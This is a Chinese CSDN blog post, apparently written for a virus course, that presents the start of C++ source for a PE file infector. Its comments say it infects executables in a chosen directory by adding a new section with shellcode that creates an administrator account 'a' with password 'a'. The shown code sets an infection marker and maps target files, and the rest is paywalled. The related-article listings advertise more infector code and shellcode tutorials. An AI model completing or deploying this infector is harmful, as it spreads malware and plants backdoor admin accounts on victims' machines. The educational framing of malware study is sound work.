PE感染学习

最新推荐文章于 2023-01-11 21:56:26 发布
最新推荐文章于 2023-01-11 21:56:26 发布
阅读量984 收藏 2
点赞数
分类专栏: 软件逆向学习 c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/28254511
版权

病毒课程老师要求的代码

用到了很多PE知识: 

直接上代码吧

// ganran_pe.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>
#include <malloc.h>
#include <assert.h>



//本程序只适用于载入基址定位的。。。非随机基址
//感染指定目录的PE文件
char ItIs[MAX_PATH] = "C:\\1";
//添加了一个新节区
//然后shellcode是添加一个名为a,密码为a的administrator
//然后PEB定位kernel32只在我的win7 x64电脑上测试成功,可以稍许修改,以通用


//函数功能: 以ALIGN_BASE为对齐度对齐size
//参数说明: 
//		size:需要对齐的大小
//		ALIGN_BASE:对齐度
//返回值:	返回对齐后的大小
DWORD Align(DWORD size, DWORD ALIGN_BASE)
{
	assert(0 != ALIGN_BASE);
	if (size % ALIGN_BASE)
	{
		size = (size/ALIGN_BASE + 1) * ALIGN_BASE;
	}
	return size;
}

//函数功能: 检测感染标识和设置感染标识
//参数说明:
//		pDosHdr:执行DOS头
//返回值:	是否未被感染, 是->TRUE, 否->FALSE
BOOL SetFectFlag(PIMAGE_DOS_HEADER &pDosHdr)
{
	if (*(DWORD*)pDosHdr->e_res2 == 0x4B4B43)
	{
		return FALSE;
	}
	else
	{
		*(DWORD*)pDosHdr->e_res2 = 0x4B4B43;
		return TRUE;
	}
}

//函数功能:	打开文件并判断文件类型
//参数说明:	
//		szPath:文件绝对路径
//		lpMemory:保存文件内存映射地址
//返回值:	是否是PE文件, 是->TRUE, 否->FALSE
BOOL CreateFileAndCheck(char *szPath, LPVOID &lpMemory, HANDLE &hFile)
{
	//打开文件
	hFile = CreateFileA(szPath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hFile == INVALID_HANDLE_VALUE)
	{
		//printf("CreateFileA %s Failed! ErrorCode = %d\n", szPath, GetLastError());
		return FALSE;
	}
	HANDLE hMap = CreateFileMappingA(hFile, NULL, PAGE_READWRITE, NULL, NULL, NULL);
	if (!hMap)
	{
		//printf("CreateFileMappingA %s Failed! ErrorCode = %d\n", szPath, GetLastError());
		return FALSE;
	}
	lpMemory = MapViewOfFile(hMap, FILE_MAP_READ|FILE_MAP_WRITE, NULL, NULL, NULL);
	if (!lpMemory)
	{
		//printf("MapViewOfFile %s Failed! ErrorCode = %d\n", szPath, GetLastError());
		CloseHandle(hMap);
		return FALSE;
	}

	CloseHandle(hMap);
	return TRUE;
}

//函数功能: 感染指定文件
//参数说明:
//		szPath:文件绝对路径
DWORD dwNum;
PBYTE pByte;
DWORD dwOldOp;
DWORD dwNum1;
DWORD nSecSize;
DWORD size;
DWORD
最低0.47元/天 解锁文章
pandamac
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PE感染-添加节区
收集学习过程中对自己有帮助的牛人文章
12-02 1264
#include #include #include //本程序只适用于载入基址定位的。。。非随机基址 //感染指定目录的PE文件 char ItIs[MAX_PATH] = "D:\\桌面\\感染PE\\感染目录"; //添加了一个新节区 //然后shellcode是添加一个名为a,密码为a的administrator //然后PEB定位kernel32只在我的win7 x64电脑上测试
漏洞利用原理(初级)
wk19951125的博客
08-09 598
开发shellcode的艺术shellcode概述shellcode与exploit定位shellcode栈帧移位与jmp esp shellcode概述 shellcode与exploit shellcode:通称缓冲区溢出攻击中植入进程的代码。 exploit:一般以一段代码的形式出现,用于生成攻击性的网络数据包或者其他形式的攻击性输入。核心是淹没返回地址,劫持进程控制权,之后跳转去执行sh...
写精简的shellcode
农家小舍
09-30 1411
写精简的shellcode(译自:Writing Small Shellcode)信息来源:http://www.ngssoftware.com/文章作者:Dafydd Stuttard (daf[at]ngssoftware[dot]com)译文作者:fqucuo、wangweinoo1原作时间:应为05年左右译者声明:本人在https://forum.eviloct
【reverse】逆向4 初识堆栈
woodwhale的博客
07-31 3536
逆向4 初识堆栈 1、引入 假设我们需要一块内存,有如下的要求 主要用于临时存储一些数据(如果数据很少可以放入寄存器中) 能够记录存了多少数据 能够非常快速的找到某个数据 2、模拟堆栈 我们可以设计这样的结构图 top:栈顶 base:栈底 windows操作系统分配堆栈是从高地址向低地址分配 为了统一,我们也这样模拟 压入数据 第一种添加数据的方式(先存数据再改地址) 我们将ebx作为栈底,edx作为栈顶,内存编号都位0x19FF78 将AAAAAAAA数据存入栈中之后,将edx的内存编号减去4
汇编_常用指令
热门推荐
qq_44657899的博客
05-22 1万+
常用汇编指令 word ptr 与 byte ptr word ptr指明了指令访问的内存单元是一个字单元。 byte ptr指明了指令访问的内存单元是一个字节单元。 dword ptr指令访问的内存单元是一个双字单元。 push 例如下面这段汇编指令 _main: push 3 push 2 第一行_main,会创建一个main帧 第二行push 3,会将esp寄存器里的地址减去四个字节,然后将3存入该地址 第三行push 2,会将esp寄存器里的地址再减去四个字节,然后将2存
郁金香由浅入深学习感染pe文件的操作
04-04
郁金香由浅入深学习感染pe文件的操作,最好的教程,需要请快下?
感染PE文件示例源码(C++与汇编)
03-25
本资源提供了用C++和汇编语言编写的感染PE文件的源代码示例,旨在帮助学习者深入理解这一过程。 首先,我们要明确的是,"感染"PE文件通常指的是在不改变其原始功能的前提下,向文件中添加额外的代码或数据,这在...
PE文件头感染视频教程BT种子
12-16
3. **感染方式**:介绍不同类型的PE感染策略,比如尾部感染(在文件末尾添加病毒代码)、替换感染(替换部分原有代码)和多态感染(每次感染都会改变自身代码)。 4. **反病毒技术**:讨论如何检测和修复被感染PE...
class5-PE结构及PE感染
05-11
**PE结构及PE感染者** 在IT领域,尤其是逆向工程和恶意软件分析中,了解PE(Portable Executable)结构是至关重要的。PE是Windows操作系统中用于执行程序和动态链接库(DLL)的标准文件格式。本课程将深入讲解PE的...
dword ptr指令详细解析
09-05
8086CPU的指令,可以处理两种尺寸的数据,byte和word。所以在机器指令中要指明,指令进行的是字操作还是字节操作
最新EXE感染代码。PE感染
08-31
仅限于技术交流。请勿做非法用图!!感染代码,PE感染
郁金香由浅入深学习感染pe文件的操作.rar
02-15
《郁金香由浅入深学习感染PE文件的操作》 在IT安全领域,了解和研究恶意软件的行为至关重要,其中“郁金香”是一种常见的PE(Portable Executable)文件感染方式。PE文件是Windows操作系统下的可执行文件格式,包括...
PE文件感染程序设计(PE病毒)
最新发布
Zyecho的博客
01-11 2667
记录PE病毒设计的入门实验
举例说明在汇编语言中,"[]"的用法
菜菜鸟_黑马的专栏
01-25 1462
"[]"的用法在"常见问题"已经有所说明,引用如下:1、push dword ptr [024c1100] 压栈024c1100值的双字2、cmp eax,[ebp+14] eax-ebp+14的有效值,不保留值,主要看标志位3、cmp byte ptr [eax],46 字节型eax-46,看标志位4、lea eax,[edx-02] 把edx-02的有效值(一个地址值)给eax5、mov
汇编指令(上)
gacmy的专栏
04-08 728
突然发现ollyDBG 可以用来学习汇编 闲的蛋疼没事的时候搞搞 生活是灰色的,编程工作是蛋疼的!! 只能找点东西去填补心里的阴暗!! 这里仅仅作为参考,跟狗屎一样的东西!没人能看懂写的什么,所以千万不要看,自己去拿ollyDbg去测试这些汇编指令到底是个什么玩意!! push 指令将 某个值或 某个地址的内容存储到堆栈中去 eip = 00401000 此处的指令 push 0x0
定位API地址学习
weixin_30823227的博客
08-01 114
采用FS去定位API地址: FS寄存器指向当前活动线程的TEB结构(线程结构) 偏移 说明 000 指向SEH链指针 004 线程堆栈顶部 008 线程堆栈底部 00C SubSystemTib 010 FiberData 014 ArbitraryUserPointer 018 FS段寄存器在内存中的镜像地址 020 进程PID 024 线程ID 02C 指向线程局部存储指针 03...
shellcode的技巧
weixin_30767921的博客
10-29 190
一、缓冲区组织方式 shellcode在返回地址前:适合于缓冲区较大,使总攻击串长度较小,不会破坏前栈帧;但是有可能会被压栈数据破坏。 shellcode在返回地址后:不会担心被新的压栈数据破坏;但会破坏前栈帧,不利于现场的恢复。 二、抬高栈顶保护shellcode 使得压栈数据不会破坏shellcode。 三、增加成功率 1.将shellcode布置在一大段nop后 2.采用连续的...
cmp 字节 汇编_汇编语言中"[]"的用法
weixin_39796238的博客
12-30 1819
"[]"的用法在"常见问题"已经有所说明,引用如下:1、push dword ptr [024c1100] 压栈024c1100值的双字2、cmp eax,[ebp+14] eax-ebp+14的有效值,不保留值,主要看标志位3、cmp byte ptr [eax],46 字节型eax-46,看标志位4、lea eax,[edx-02] 把edx-02的有效值(一个地址值)给eax5、mov ec...
秦万强PE文件系统详解与学习笔记概览
秦万强的《PE文件学习笔记》是一份详细的文档,主要针对Windows可执行文件(PE文件)进行了深入解析。PE文件是Windows操作系统下二进制可执行文件的标准格式,用于存储应用程序的机器代码、资源数据和相关元数据。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值